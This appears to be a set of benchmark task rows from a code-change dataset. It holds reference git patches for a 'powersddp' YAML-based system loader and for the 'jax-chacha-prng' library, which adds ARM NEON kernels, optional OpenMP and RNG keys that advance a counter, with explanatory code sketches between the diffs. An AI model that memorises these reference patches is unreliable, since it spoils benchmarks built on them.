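                print("System loaded from {} file".format(self.path))
        elif "data" in self.__dict__:
            pass  # payload already stored as self.data by __dict__.update above
        else:
            raise NotImplementedError("provide either 'path' or 'data'")

# load from a payload dictionary
s1 = System(data={"load": [50, 50, 50]})

# load from a file
with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as f:
    json.dump({"load": [10, 20, 30]}, f)
s2 = System(path=f.name)
print(s1.data["load"], s2.data["load"])
```

Storing the kwargs via `self.__dict__.update(kwargs)` is what lets a single constructor accept either source without separate parameters.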
diff --git a/powersddp/util/__init__.py b/powersddp/util/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/powersddp/util/_yml.py b/powersddp/util/_yml.py
new file mode 100644
index 0000000..b0b21b8
--- /dev/null
+++ b/powersddp/util/_yml.py
@@ -0,0 +1,17 @@
+import yaml
+import os
+
+
+class YmlLoader(yaml.SafeLoader):
+ def __init__(self, stream):
+
+ self._root = os.path.split(stream.name)[0]
+
+ super(YmlLoader, self).__init__(stream)
+
+ def include(self, node):
+
+ filename = os.path.join(self._root, self.construct_scalar(node))
+
+ with open(filename, "r") as f:
+ return yaml.load(f, YmlLoader)
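The `!include` constructor above lets one YAML file embed another, resolved relative to the including file — this is how `system.yml` pulls in `system-hydro.yml` and `system-thermal.yml` further down in this patch. A self-contained sketch (same loader code, exercised against temporary files; requires PyYAML, which the patch adds as a dependency):

```python
import os
import tempfile
import yaml  # PyYAML

class YmlLoader(yaml.SafeLoader):
    """SafeLoader that resolves '!include other.yml' relative to the including file."""
    def __init__(self, stream):
        # remember the directory of the file being parsed
        self._root = os.path.split(stream.name)[0]
        super().__init__(stream)

    def include(self, node):
        filename = os.path.join(self._root, self.construct_scalar(node))
        with open(filename, "r") as f:
            return yaml.load(f, YmlLoader)

YmlLoader.add_constructor("!include", YmlLoader.include)

with tempfile.TemporaryDirectory() as tmpdir:
    with open(os.path.join(tmpdir, "thermal.yml"), "w") as f:
        f.write("- name: GT1\n  capacity: 15\n  cost: 10\n")
    with open(os.path.join(tmpdir, "system.yml"), "w") as f:
        f.write("load: [50, 50, 50]\nthermal-units: !include thermal.yml\n")
    with open(os.path.join(tmpdir, "system.yml")) as f:
        system = yaml.load(f, YmlLoader)

print(system["thermal-units"][0]["name"])
```

Because `include` calls `yaml.load` with `YmlLoader` again, included files may themselves contain further `!include` tags.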
diff --git a/pyproject.toml b/pyproject.toml
index 6334502..31928aa 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -10,12 +10,16 @@ exclude = ["Makefile","README.rst","Notebook.ipynb"]
[tool.poetry.dependencies]
python = "^3.8"
+PyYAML = "^5.4.1"
+cvxopt = "^1.2.6"
[tool.poetry.dev-dependencies]
pytest = "^5.2"
black = "^21.7b0"
pylint = "^2.9.6"
mypy = "^0.910"
+jupyterlab = "^3.1.6"
+types-PyYAML = "^5.4.6"
[tool.black]
line-length = 88
diff --git a/system-hydro.yml b/system-hydro.yml
new file mode 100644
index 0000000..840a01d
--- /dev/null
+++ b/system-hydro.yml
@@ -0,0 +1,10 @@
+-
+ name: HU1
+ v_max: 100
+ v_min: 20
+ prod: 0.95
+ flow_max: 60
+ inflow_scenarios:
+ - [23,16]
+ - [19,14]
+ - [15,11]
\ No newline at end of file
diff --git a/system-thermal.yml b/system-thermal.yml
new file mode 100644
index 0000000..7dd685b
--- /dev/null
+++ b/system-thermal.yml
@@ -0,0 +1,8 @@
+-
+ name: GT1
+ capacity: 15
+ cost: 10
+-
+ name: GT2
+ capacity: 10
+ cost: 25
\ No newline at end of file
diff --git a/system.yml b/system.yml
new file mode 100644
index 0000000..26373dd
--- /dev/null
+++ b/system.yml
@@ -0,0 +1,7 @@
+load: [50,50,50]
+discretizations: 3
+stages: 3
+scenarios: 2
+outage_cost: 500
+hydro-units: !include system-hydro.yml
+thermal-units: !include system-thermal.yml
\ No newline at end of file
| System can be loaded from either a file or a payload dictionary
## Description
- First Feature completed
- `System.dispach()` already in progress
- `Readme.md` documented
- Methods documentation lagging behind
| 2021-08-15T03:30:35 | 0.0 | [] | [] |
|||
DPBayes/jax-chacha-prng | DPBayes__jax-chacha-prng-9 | 42bf98c43624280bc35016227dd4035e89bc1e41 | diff --git a/.github/workflows/build_wheels.yml b/.github/workflows/build_wheels.yml
index 102c824..573fe09 100644
--- a/.github/workflows/build_wheels.yml
+++ b/.github/workflows/build_wheels.yml
@@ -38,7 +38,7 @@ jobs:
sudo apt-get update
sudo apt-get install gcc-${{ matrix.cuda-setup[2] }} g++-${{ matrix.cuda-setup[2] }}
sudo ln -sf /usr/bin/gcc-${{ matrix.cuda-setup[2] }} /usr/bin/gcc
- sudo ln -sf /usr/bin/g++-${{ matrix.cuda-setup[2] }} /usr/bin/gcc
+ sudo ln -sf /usr/bin/g++-${{ matrix.cuda-setup[2] }} /usr/bin/g++
- name: Set up CUDA-Toolkit ${{ matrix.cuda-setup[0] }}
run: |
wget -q -O installer.run ${{ matrix.cuda-setup[1] }}
diff --git a/CMakeLists.txt b/CMakeLists.txt
index 4b0fa09..07bb7ab 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -1,13 +1,77 @@
# SPDX-License-Identifier: Apache-2.0
-# SPDX-FileCopyrightText: © 2021 Aalto University
+# SPDX-FileCopyrightText: © 2022 Aalto University
cmake_minimum_required(VERSION 3.18)
project(jax-chacha20-prng LANGUAGES CXX)
option(BUILD_TESTING "Build tests for native kernels" OFF)
+option(FORCE_GENERIC "Build without CPU architecture optimized instructions" OFF)
set(CMAKE_CXX_STANDARD 14)
-add_compile_options($<$<COMPILE_LANGUAGE:CXX>:-msse>)
+set(cpu_arch_path "${CMAKE_CURRENT_LIST_DIR}/lib/generic/")
+set(cpu_arch_def "ARCH_GENERIC")
+set(SSE_ENABLED "No")
+set(NEON_ENABLED "No")
+
+if(NOT FORCE_GENERIC)
+ try_run(SSE_RUN_SUCCESS SSE_COMPILE_SUCCESS
+ ${CMAKE_CURRENT_BINARY_DIR} ${CMAKE_CURRENT_SOURCE_DIR}/cmake_config/sse_test.cpp
+ #WORKING_DIRECTORY ${CMAKE_CURRENT_LIST_DIR}/cmake_config/
+ )
+
+ if (NOT SSE_COMPILE_SUCCESS)
+ # could not compile sse intrinsics, maybe we need the compiler flag?
+ try_run(SSE_RUN_SUCCESS SSE_COMPILE_SUCCESS
+ ${CMAKE_CURRENT_BINARY_DIR} ${CMAKE_CURRENT_SOURCE_DIR}/cmake_config/sse_test.cpp
+ COMPILE_DEFINITIONS "-msse"
+ )
+ if (SSE_COMPILE_SUCCESS)
+ add_compile_options($<$<COMPILE_LANGUAGE:CXX>:-msse>)
+ endif()
+ endif()
+
+ if (NOT SSE_COMPILE_SUCCESS)
+ try_run(NEON_RUN_SUCCESS NEON_COMPILE_SUCCESS
+ ${CMAKE_CURRENT_BINARY_DIR} ${CMAKE_CURRENT_SOURCE_DIR}/cmake_config/neon_test.cpp
+ )
+
+ if (NOT NEON_COMPILE_SUCCESS)
+ # could not compile neon intrinsics, maybe we need the compiler flag?
+ try_run(NEON_RUN_SUCCESS NEON_COMPILE_SUCCESS
+ ${CMAKE_CURRENT_BINARY_DIR} ${CMAKE_CURRENT_SOURCE_DIR}/cmake_config/neon_test.cpp
+ COMPILE_DEFINITIONS "-mfpu=neon"
+ )
+ if (NEON_COMPILE_SUCCESS)
+ add_compile_options($<$<COMPILE_LANGUAGE:CXX>:-mfpu=neon>)
+ endif()
+ endif()
+ endif()
+
+ if (SSE_COMPILE_SUCCESS)
+ set(cpu_arch_path "${CMAKE_CURRENT_LIST_DIR}/lib/intel/")
+ set(cpu_arch_def "ARCH_INTEL")
+ set(SSE_ENABLED "Yes")
+ if (NOT SSE_RUN_SUCCESS EQUAL 0)
+ message(WARNING "Can compile with Intel SSE instructions but failed a test run (cross-compiling?); will compile with SSE anyways - set FORCE_GENERIC to disable")
+ endif()
+ endif()
+
+ if (NEON_COMPILE_SUCCESS)
+ set(cpu_arch_path "${CMAKE_CURRENT_LIST_DIR}/lib/arm/")
+ set(cpu_arch_def "ARCH_ARM")
+ set(NEON_ENABLED "Yes")
+ if (NOT NEON_RUN_SUCCESS EQUAL 0)
+ message(WARNING "Can compile with ARM Neon instructions but failed a test run (cross-compiling?); will compile with Neon anyways - set FORCE_GENERIC to disable")
+ endif()
+ endif()
+
+endif()
+
+
+message("-- Detected architecture - " ${CMAKE_SYSTEM_PROCESSOR})
+
+message("-- SSE instructions enabled - ${SSE_ENABLED}")
+message("-- ARM Neon instructions enabled - ${NEON_ENABLED}")
# native kernels require pybind11; however, if it is installed from pip, it has issues
# in detecting the Python interpreter and libraries during CMake build in a conda env,
@@ -34,11 +98,16 @@ if(NOT EXISTS "${PROJECT_SOURCE_DIR}/extern/pybind11/CMakeLists.txt")
message(FATAL_ERROR "The pybind11 repository was not downloaded! Please run manually: git submodule update --init --recursive .")
endif()
-find_package(Python COMPONENTS Interpreter Development REQUIRED)
+find_package(Python3 COMPONENTS Interpreter Development REQUIRED)
add_subdirectory(extern/pybind11)
# find_package(pybind11 REQUIRED) # broken; does not use correct Python interpreter/libraries in a conda env
-find_package(OpenMP REQUIRED)
+find_package(OpenMP)
+if(OpenMP_CXX_FOUND)
+ add_compile_definitions(OPENMP_AVAILABLE)
+else()
+ message(WARNING "OpenMP not found - Compiling without, but you may see lower performance.")
+endif()
include_directories(${CMAKE_CURRENT_LIST_DIR}/lib)
@@ -46,15 +115,24 @@ pybind11_add_module(
native
${CMAKE_CURRENT_LIST_DIR}/lib/cpu_kernel.cpp
${CMAKE_CURRENT_LIST_DIR}/lib/python_bindings.cpp)
-target_link_libraries(native PUBLIC OpenMP::OpenMP_CXX)
+target_include_directories(native PRIVATE ${cpu_arch_path})
+target_compile_definitions(native PRIVATE ${cpu_arch_def})
+
+if(OpenMP_CXX_FOUND)
+ target_link_libraries(native PUBLIC OpenMP::OpenMP_CXX)
+endif()
if (BUILD_TESTING)
add_executable(cpu_kernel_tests
${CMAKE_CURRENT_LIST_DIR}/tests/lib/cpu_kernel_tests.cpp
${CMAKE_CURRENT_LIST_DIR}/lib/cpu_kernel.cpp)
target_include_directories(cpu_kernel_tests PRIVATE
- ${CMAKE_CURRENT_LIST_DIR}/lib/)
- target_link_libraries(cpu_kernel_tests PUBLIC OpenMP::OpenMP_CXX)
+ ${CMAKE_CURRENT_LIST_DIR}/lib/
+ ${cpu_arch_path})
+ target_compile_definitions(cpu_kernel_tests PRIVATE ${cpu_arch_def})
+ if (OpenMP_CXX_FOUND)
+ target_link_libraries(cpu_kernel_tests PUBLIC OpenMP::OpenMP_CXX)
+ endif()
endif()
include(CheckLanguage)
@@ -78,7 +156,11 @@ if (CMAKE_CUDA_COMPILER)
target_include_directories(gpu_kernel_tests PRIVATE
${CMAKE_CURRENT_LIST_DIR}/lib/)
target_link_libraries(gpu_kernel_tests PUBLIC OpenMP::OpenMP_CXX)
+ target_compile_definitions(gpu_kernel_tests PRIVATE ${cpu_arch_def})
set_property(TARGET gpu_kernel_tests PROPERTY CUDA_ARCHITECTURES 35)
+ if (OpenMP_CXX_FOUND)
+ target_link_libraries(gpu_kernel_tests PUBLIC OpenMP::OpenMP_CXX)
+ endif()
endif()
else()
message(WARNING "CUDA not found - building for CPU only!")
diff --git a/ChangeLog.txt b/ChangeLog.txt
index ce3787c..df20bea 100644
--- a/ChangeLog.txt
+++ b/ChangeLog.txt
@@ -1,19 +1,32 @@
+- 2.0.0-rc.2:
+ - Fix: OpenMP is no longer a strict requirement for installation.
+ - Added: chacha.native.openmp_accelerated, returns True if CPU kernels are parallelised using OpenMP.
+ - Added: Generic (not hardware-specific) CPU kernels as well as vectorized CPU kernels for ARM CPUs.
+ - Added: random.is_state_invalidated to check if a PRNGKey was invalidated.
+ - Changed: random.split now can perform nested splits only up to a limit and returns
+ an invalidated state if this limit is exceeded. This is to guarantee
+            unique states after each split derived from the same initial randomness state.
+  - Changed: random.random_bits now returns a new rng key for subsequent calls to
+            produce randomness as well as an error flag integer,
+ which is set if the input randomness state was invalidated or the
+ randomness counter overflows.
+ - Changed: random.uniform now returns all NaNs if the input randomness state
+ was invalidated or the randomness counter overflows. It also accepts additional
+ kwarg return_next_key that returns a new rng key.
+ - Removed: random.fold_in.
+- 1.2.0:
+ - Deprecated: random.fold_in.
- 1.1.1:
- Added: support for jax up to v0.3.13.
- 1.1.0:
- Added: support for multiple layers of vmap wraps for functions in chacha.random.
- Added: support for jax up to v0.3.1.
- 1.0.0:
+ - Added: Native implementations for ChaCha block function as JAX ops.
- Added: chacha.native.cuda_supported, returns True if cuda kernels were compiled.
- - Added: support for jax up to v0.2.27.
-- 1.0.0-rc.3:
- Added: wheels for Python 3.10.
-- 1.0.0-rc.2:
- - Added: support for jax v0.2.21 - v0.2.22.
+ - Added: support for jax up to v0.2.27.
- Removed: support for jax v0.2.10 - v0.2.11.
-- 1.0.0-rc.1:
- - Added: support for jax v0.2.15 - v0.2.20.
- - Added: Native implementations for ChaCha block function as JAX ops.
- 0.1.0-alpha.2:
- Fix: random.random_bits() no longer fails for empty shape.
- Added: support for jax v0.2.14.
diff --git a/README.md b/README.md
index dc57516..03f959f 100644
--- a/README.md
+++ b/README.md
@@ -28,6 +28,11 @@ The package currently exposes basic RNG functions using the same interface as `J
*Note*: `PRNGKey` instances of this ChaCha20-based RNG are not interoperable with those of `jax.random`, i.e., you cannot mix them.
+`random_bits` and (optionally) `uniform` return a new rng key resulting from advancing the counter field in the key provided to them
+according to the amount of randomness they were tasked to produce. This key may be used for subsequent calls that produce randomness,
+but CANNOT be used as an input for `split`.
+
+
**Security notice**: Versions prior to 2.0.0 may repeat random states via the `split` and `fold_in` functions and
therefore not produce sufficiently random outputs.
@@ -58,16 +63,23 @@ State construction and use:
## Installing
-For the latest stable version install from the `v1-stable` branch via `pip`:
+For the latest stable version install from the `stable` branch via `pip`:
+```
+pip install git+https://github.com/DPBayes/jax-chacha-prng@stable#egg=jax-chacha-prng
+```
+
+For the latest stable release of major version X, use the `vX-stable` branch, i.e.,
+for major version 2 use
```
-pip install git+https://github.com/DPBayes/jax-chacha-prng@v1-stable#egg=jax-chacha-prng
+pip install git+https://github.com/DPBayes/jax-chacha-prng@v2-stable#egg=jax-chacha-prng
```
Installation will compile CUDA kernels if the CUDA library is present on the system,
otherwise only CPU kernels will be built. To check whether CUDA kernels were
built and installed, you can check the return value of `chacha.native.cuda_supported()`.
-Pre-built binary wheels are also available alongside the releases on GitHub.
+Pre-built binary wheels are also available alongside the releases on GitHub; however,
+these are currently only available for the x86_64 platform.
### Note about JAX versions
@@ -84,7 +96,7 @@ JAX version known to be compatible with JAX-ChaCha-PRNG:
pip install .[compatible-jax]
```
-JAX-ChaCha-PRNG is currently known to work reliably with JAX versions 0.2.12 - 0.2.27 .
+JAX-ChaCha-PRNG is currently known to work reliably with JAX versions 0.2.12 - 0.3.17 .
We regularly check the compatible version range, but do not expect new versions of JAX to be immediately tested.
## Versioning
diff --git a/arm_container/Dockerfile b/arm_container/Dockerfile
new file mode 100644
index 0000000..9b6926b
--- /dev/null
+++ b/arm_container/Dockerfile
@@ -0,0 +1,23 @@
+# SPDX-License-Identifier: Apache-2.0
+# SPDX-FileCopyrightText: © 2022 Aalto University
+
+FROM ubuntu:jammy AS qemu-arm-base
+
+RUN sed -i 's/http/[arch=i386,amd64] http/g' /etc/apt/sources.list
+RUN echo "deb [arch=arm64] http://ports.ubuntu.com/ jammy main restricted" >> /etc/apt/sources.list
+RUN echo "deb [arch=arm64] http://ports.ubuntu.com/ jammy-updates main restricted" >> /etc/apt/sources.list
+
+RUN dpkg --add-architecture arm64
+RUN apt update && apt upgrade -y && apt install -y qemu binfmt-support qemu-user-static libc6:arm64
+
+RUN /bin/bash
+
+FROM qemu-arm-base
+
+RUN apt install -y gcc-aarch64-linux-gnu g++-aarch64-linux-gnu libc6-dev-arm64-cross cmake python3 python3-dev libpython3-dev:arm64
+RUN mkdir -p /work/build/ /work/src/
+ADD docker_main.sh /work/docker_main.sh
+RUN chmod +x /work/docker_main.sh
+WORKDIR /work
+
+ENTRYPOINT [ "/work/docker_main.sh" ]
diff --git a/arm_container/docker_main.sh b/arm_container/docker_main.sh
new file mode 100644
index 0000000..4d60967
--- /dev/null
+++ b/arm_container/docker_main.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+# SPDX-License-Identifier: Apache-2.0
+# SPDX-FileCopyrightText: © 2022 Aalto University
+
+cd /work/build
+cmake \
+ -DCMAKE_SYSTEM_NAME=Linux -DCMAKE_SYSTEM_PROCESSOR=aarch64 \
+ -DCMAKE_C_COMPILER=/usr/bin/aarch64-linux-gnu-gcc \
+ -DCMAKE_CXX_COMPILER=/usr/bin/aarch64-linux-gnu-g++ \
+ -DCMAKE_FIND_ROOT_PATH=/usr/aarch64-linux-gnu/ \
+ -DCMAKE_FIND_ROOT_PATH_MODE_PROGRAM=BOTH \
+ -DCMAKE_CROSSCOMPILING_EMULATOR="/usr/bin/qemu-aarch64-static;-L;/usr/aarch64-linux-gnu/" \
+ -DBUILD_TESTING=On \
+ -DFORCE_GENERIC=$FORCE_GENERIC \
+ -DCMAKE_BUILD_TYPE=Release ../src/
+make
+/usr/bin/qemu-aarch64-static -L /usr/aarch64-linux-gnu/ ./cpu_kernel_tests
\ No newline at end of file
diff --git a/chacha/cipher.py b/chacha/cipher.py
index d59d41c..943f8cc 100644
--- a/chacha/cipher.py
+++ b/chacha/cipher.py
@@ -73,12 +73,12 @@ def setup_state(
elif jax.lax.dtype(counter) != ChaChaStateElementType or jnp.size(counter) != ChaChaCounterSizeInWords:
raise ValueError("counter must be a single 32-bit unsigned integer!")
- key_bits = key_array.size * 4
- if key_bits == 16:
+ key_bytes = key_array.size * 4
+ if key_bytes == 16:
key_array = jnp.tile(key_array, 2)
key_array = key_array.reshape(2, 4) # type: ignore # numpy seems confused about this
inputs = jnp.hstack((counter, iv_array))
- state = ChaChaState(jnp.vstack((KEY_GEN_CONSTANTS[key_bits], key_array, inputs)))
+ state = ChaChaState(jnp.vstack((KEY_GEN_CONSTANTS[key_bytes], key_array, inputs)))
return state
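The renamed `key_bytes` feeds both the 128-bit-key tiling and the constants lookup above. A pure-Python sketch of the resulting 4x4 ChaCha state layout (illustrative only — the package builds a `jnp` array; the constants are derived here from their well-known ASCII strings, keyed by key length in bytes as the rename suggests):

```python
import struct

# ChaCha "expand 16-byte k" / "expand 32-byte k" constants, computed from
# their ASCII strings instead of hard-coded, keyed by key length in bytes.
KEY_GEN_CONSTANTS = {
    n: list(struct.unpack("<4I", "expand {}-byte k".format(n).encode()))
    for n in (16, 32)
}

def setup_state(key_words, counter, nonce_words):
    """Sketch of the 4x4 ChaCha state: constants / key / key / counter+nonce."""
    key_bytes = len(key_words) * 4          # each word is 4 bytes
    if key_bytes == 16:                     # a 128-bit key is simply used twice
        key_words = key_words * 2
    return [KEY_GEN_CONSTANTS[key_bytes],
            list(key_words[:4]), list(key_words[4:]),
            [counter] + list(nonce_words)]

state = setup_state([1, 2, 3, 4], 0, [7, 8, 9])
print(hex(state[0][0]))   # 0x61707865: "expa" read as a little-endian word
print(state[1] == state[2])
```

Note that the constants lookup uses the key size computed before tiling, which is why `key_bytes` is evaluated first.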
diff --git a/chacha/native.pyi b/chacha/native.pyi
index a606f12..bd9050b 100644
--- a/chacha/native.pyi
+++ b/chacha/native.pyi
@@ -1,5 +1,5 @@
# SPDX-License-Identifier: Apache-2.0
-# SPDX-FileCopyrightText: © 2021 Aalto University
+# SPDX-FileCopyrightText: © 2022 Aalto University
from typing import Callable, Sequence, Any
@@ -9,3 +9,4 @@ XlaCustomCallGPU = Callable[[Any, Sequence[bytes], bytes, int], None]
def cpu_chacha20_block_factory() -> XlaCustomCallCPU: ...
def gpu_chacha20_block_factory() -> XlaCustomCallGPU: ...
def cuda_supported() -> bool: ...
+def openmp_accelerated() -> bool: ...
diff --git a/chacha/random.py b/chacha/random.py
index 6d7e794..b0830d3 100644
--- a/chacha/random.py
+++ b/chacha/random.py
@@ -10,8 +10,8 @@
The following invariants hold:
- The 256 bit key provides base randomness that is expanded by PRNG; it given by the user as seed to function `PRNGKey`
-- The 32 bit counter in a randomness state is always set to zero; randomness expander such as `random_bits` increment
- it internally to provide streams of randomness.
+- The 32 bit counter in a randomness state is always incremented by randomness expanders such as `random_bits`
+ to provide streams of randomness.
- The 96 bit IV is used for randomness state splits using the `split` function; splitting results in a new state
that maintains the same cipher key, a counter value of zero and a fresh IV derived from the previous IV in such
a way that the new IV is unique among all states derived from the same initial key state. An IV value of zero
@@ -70,7 +70,7 @@ def is_state_invalidated(rng_key: RNGState) -> bool:
@partial(jax.jit, static_argnums=(1, 2))
def random_bits(rng_key: RNGState, bit_width: int, shape: typing.Sequence[int])\
- -> typing.Tuple[jnp.ndarray, jnp.uint32]:
+ -> typing.Tuple[jnp.ndarray, RNGState, jnp.uint32]:
""" Generates an array containing random integers.
Note that this function enters a failure state if the `rng_key` is invalidated
@@ -79,13 +79,14 @@ def random_bits(rng_key: RNGState, bit_width: int, shape: typing.Sequence[int])\
of containing an array of random values.
Args:
- rng_key: The not-invalidated PRNGKey object from which to generate random bits.
+ rng_key: The not-invalidated RNGState object from which to generate random bits.
bit_width: The number of bits in each element of the output.
shape: The shape of the output array.
Returns:
A tuple containing
- array of the given shape containing uniformly random unsigned integers with the given bit width,
+ - the next RNGState after generating the requested amount of random bits (with the counter value advanced),
- an integer representing an array of error flags (see `ErrorFlag`)
"""
if bit_width not in _UINT_DTYPES:
@@ -106,13 +107,17 @@ def generate_block(c: RNGState) -> jnp.ndarray:
out = cc.serialize(blocks, dtype)
assert jnp.size(out) >= size
- counter_exceeded = cc.get_counter(rng_key) >= jnp.uint32(-num_blocks)
+ next_rng_key = cc.increase_counter(rng_key, num_blocks)
+
+ counter_exceeded = cc.get_counter(rng_key) >= cc.get_counter(next_rng_key) # detect wrap-around of counter
error_flags = jnp.uint32((is_state_invalidated(rng_key) << 1) ^ counter_exceeded)
out = out[:size].reshape(shape)
out = jnp.where(error_flags == 0, out, out ^ out)
- return out, error_flags
+ next_rng_key = jnp.where(error_flags == 0, next_rng_key, jnp.zeros_like(rng_key))
+
+ return out, next_rng_key, error_flags
@partial(jax.jit, static_argnums=(1,))
@@ -130,28 +135,28 @@ def _split(rng_key: RNGState, num: int) -> RNGState:
assert new_nonce_base.shape == (defs.ChaChaNonceSizeInWords,)
split_nesting_exceeded = (old_nonce[0] >= (1 << (32 - bitlength_num))) | jnp.all(old_nonce == 0)
+ state_previuosly_used = cc.get_counter(rng_key) > 0
def make_rng_key(i: int) -> RNGState:
nonce = jnp.concatenate((new_nonce_base[:defs.ChaChaNonceSizeInWords - 1], new_nonce_base[-1:] ^ i))
nonce *= (1 - split_nesting_exceeded) # set the nonce to 0 (invalid state) if split nesting limit is exceeded
+ nonce *= (1 - state_previuosly_used) # set the nonced to 0 (invalid state) if the state was already used to generate randomness
return cc.set_counter(cc.set_nonce(rng_key, nonce), 0)
return jax.vmap(make_rng_key)(jnp.arange(num, dtype=rng_key.dtype))
-# TODO: deprecate fold_in for v1.x update; release changed splitting as v2
-
-@partial(jax.jit, static_argnums=(1, 2))
+@partial(jax.jit, static_argnums=(1, 2, 5))
def _uniform(
rng_key: RNGState,
shape: typing.Tuple[int],
dtype: type,
minval: jnp.float_,
- maxval: jnp.float_
+ maxval: jnp.float_,
+ return_next_key: bool
) -> jnp.ndarray: # noqa:E121,E125
_check_shape("uniform", shape)
if not jnp.issubdtype(dtype, np.floating):
- print("encountered exc in _uniform")
raise TypeError("uniform only accepts floating point dtypes.")
minval = jax.lax.convert_element_type(minval, dtype)
@@ -164,7 +169,7 @@ def _uniform(
assert nbits in (16, 32, 64)
- bits, errors = random_bits(rng_key, nbits, shape)
+ bits, next_rng_key, errors = random_bits(rng_key, nbits, shape)
# The strategy here is to randomize only the mantissa bits with an exponent of
# 1 (after applying the bias), then shift and scale to the desired range. The
@@ -180,7 +185,10 @@ def _uniform(
jax.lax.reshape(floats * (maxval - minval) + minval, shape)
)
- return jnp.where(errors == 0, result, result * jnp.nan)
+ result = jnp.where(errors == 0, result, result * jnp.nan)
+ if return_next_key:
+ return result, next_rng_key
+ return result
def PRNGKey(seed: typing.Union[jnp.ndarray, int, bytes]) -> RNGState:
@@ -241,7 +249,8 @@ def uniform(
shape: typing.Sequence[int] = (),
dtype: np.dtype = jnp.float64,
minval: typing.Union[float, jnp.ndarray] = 0.,
- maxval: typing.Union[float, jnp.ndarray] = 1.
+ maxval: typing.Union[float, jnp.ndarray] = 1.,
+ return_next_key: bool = False
) -> jnp.ndarray: # noqa:E121,E125
"""Samples uniform random values in [minval, maxval) with given shape/dtype.
@@ -249,18 +258,20 @@ def uniform(
the output will be an array of the requested size, containing only NaN values.
Args:
- key: The PRNGKey.
+ key: The RNGState.
shape: An optional tuple of nonnegative integers representing the result shape.
dtype: An optional float dtype for the returned values (default float64).
- minval: An ptional minimum (inclusive) value broadcast-compatible with shape for the range (default 0).
+ minval: An optional minimum (inclusive) value broadcast-compatible with shape for the range (default 0).
maxval: An optional maximum (exclusive) value broadcast-compatible with shape for the range (default 1).
+ return_next_key: An optional boolean flag. If `True`, the function returns a new RNGState (with advanced counter).
Returns:
- A random array with the specified shape and dtype.
+ A random array with the specified shape and dtype if `return_next_key` is `False`.
+ A tuple consisting of the random array and a new RNGState if `return_next_key` is `True`.
"""
if not jax.dtypes.issubdtype(dtype, np.floating):
raise TypeError(f"dtype argument to `uniform` must be a float dtype, got {dtype}")
dtype = jax.dtypes.canonicalize_dtype(dtype)
shape = _canonicalize_shape(shape)
- return _uniform(key, shape, dtype, minval, maxval)
+ return _uniform(key, shape, dtype, minval, maxval, return_next_key)
diff --git a/chacha/version.py b/chacha/version.py
index 85ac9a6..d5812e4 100644
--- a/chacha/version.py
+++ b/chacha/version.py
@@ -1,10 +1,10 @@
# SPDX-License-Identifier: Apache-2.0
-# SPDX-FileCopyrightText: © 2021,2022 Aalto University
+# SPDX-FileCopyrightText: © 2022 Aalto University
MAJOR_VERSION = 2
MINOR_VERSION = 0
PATCH_VERSION = 0
-EXT_VERSION = ""
+EXT_VERSION = "rc.2"
EXT_VERSION_SUFFIX = f"-{EXT_VERSION}" if len(EXT_VERSION) > 0 else ""
diff --git a/lib/arm/cpu_kernel_arch.hpp b/lib/arm/cpu_kernel_arch.hpp
new file mode 100644
index 0000000..fcf39aa
--- /dev/null
+++ b/lib/arm/cpu_kernel_arch.hpp
@@ -0,0 +1,72 @@
+// SPDX-License-Identifier: Apache-2.0
+// SPDX-FileCopyrightText: © 2022 Aalto University
+
+#pragma once
+
+#include "../defs.hpp"
+#include <stdint.h>
+#include <utility>
+#include <arm_neon.h>
+
+
+template <uint num_positions>
+inline uint32x4_t rotate_vector_left(uint32x4_t vec)
+{
+ return vextq_u32(vec, vec, num_positions);
+}
+
+template <>
+inline uint32x4_t rotate_vector_left<0>(uint32x4_t vec)
+{
+ return vec;
+}
+
+struct StateRow
+{
+private:
+ uint32x4_t values;
+
+public:
+ StateRow() { }
+ StateRow(uint32x4_t vec) : values(std::move(vec)) { }
+ StateRow(const uint32_t row_values[ChaChaStateWordsPerRow]) : values(vld1q_u32(row_values)) { }
+
+ inline StateRow& operator+=(const StateRow other)
+ {
+ values = vaddq_u32(values, other.values);
+ return *this;
+ }
+
+ inline StateRow& operator^=(const StateRow other)
+ {
+ values = veorq_u32(values, other.values);
+ return *this;
+ }
+
+ inline StateRow& operator<<=(int num_bits)
+ {
+ values = vorrq_u32(
+ vshlq_n_u32(values, num_bits),
+ vshrq_n_u32(values, 32 - num_bits)
+ ); // (value << num_bits) ^ (value >> (32 - num_bits));
+ return *this;
+ }
+
+ template <uint num_positions>
+ inline StateRow rotate_elements_left() const
+ {
+ return StateRow(rotate_vector_left<num_positions>(values));
+ }
+
+ template <uint num_positions>
+ inline StateRow rotate_elements_right() const
+ {
+ return rotate_elements_left<(ChaChaStateWordsPerRow - num_positions) % ChaChaStateWordsPerRow>();
+ }
+
+ inline void unvectorize(uint32_t out_buffer[ChaChaStateWordsPerRow]) const
+ {
+ vst1q_u32(out_buffer, values);
+ }
+
+};
diff --git a/lib/cpu_kernel.cpp b/lib/cpu_kernel.cpp
index 8ef44fa..1ca5742 100644
--- a/lib/cpu_kernel.cpp
+++ b/lib/cpu_kernel.cpp
@@ -1,101 +1,106 @@
// SPDX-License-Identifier: Apache-2.0
-// SPDX-FileCopyrightText: © 2021 Aalto University
+// SPDX-FileCopyrightText: © 2022 Aalto University
#include "cpu_kernel.hpp"
-inline __m128i rotate_left(__m128i values, uint num_bits)
+VectorizedState::VectorizedState(StateRow a, StateRow b, StateRow c, StateRow d) : rows{a, b, c, d} { }
+
+VectorizedState::VectorizedState(const uint32_t state[ChaChaStateSizeInWords]) : rows{
+ StateRow(state + 0 * ChaChaStateSizeInRows),
+ StateRow(state + 1 * ChaChaStateSizeInRows),
+ StateRow(state + 2 * ChaChaStateSizeInRows),
+ StateRow(state + 3 * ChaChaStateSizeInRows)
+} { }
+
+void VectorizedState::unvectorize(uint32_t out_state[ChaChaStateSizeInWords]) const
{
- return _mm_xor_si128(
- _mm_slli_epi32(values, num_bits),
- _mm_srli_epi32(values, 32 - num_bits)
- ); // (value << num_bits) ^ (value >> (32 - num_bits));
+ for (uint i = 0; i < ChaChaStateSizeInRows; ++i)
+ {
+ rows[i].unvectorize(out_state + i * ChaChaStateSizeInRows);
+ }
}
-VectorizedState quarterround_sse(VectorizedState state)
+StateRow& VectorizedState::operator[](uint i)
{
- __m128i a = state[0];
- __m128i b = state[1];
- __m128i c = state[2];
- __m128i d = state[3];
- a = _mm_add_epi32(a, b); // a += b;
- d = _mm_xor_si128(d, a); // d ^= a;
